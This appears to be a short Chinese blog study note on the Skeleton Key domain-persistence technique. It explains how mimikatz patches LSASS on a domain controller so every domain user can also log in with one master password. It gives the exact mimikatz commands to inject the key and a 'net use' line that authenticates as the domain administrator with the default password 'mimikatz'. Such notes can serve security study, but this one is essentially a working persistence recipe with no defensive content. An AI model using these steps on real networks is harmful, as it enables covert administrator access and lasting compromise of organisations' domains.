域权限维持：Skeleton Key

参考作者：遗忘

Skeleton Key被安装在64位的域控服务器上,支持Windows Server2003到Windows Server2012 R2,能够让所有域用户使用同一个万能密码进行登录，现有的所有域用户使用原密码仍能继续登录，注意并不能更改用户权限，这里需要注意的是重启将失效。

mimikatz的MISC::Skeleton，在 DC 中注入万能钥匙（Skeleton Key）到 LSASS 进程中。这使得所有用户所使用的万能钥匙修补DC使用"主密码” （又名万能钥匙）以及他们自己通常使用的密码进行身份验证。

1、mimikaz执行命令：privilege::debug misc::skeleton

2、mimikatz的默认Skeleton Key设置为mimikatz（坑点：使用主机名链接）
net use \\WIN-6HQC11EJBDP.yiwang.com\c$ /user:"yiwang\administrator" "mimikatz"

posted @ 2019-11-15 12:45 zpchcbd 阅读(647) 评论(0) 编辑收藏举报

刷新页面返回顶部

记录部分个人学习和部分实战的笔记 我会慢慢补全部分空白的文章 :)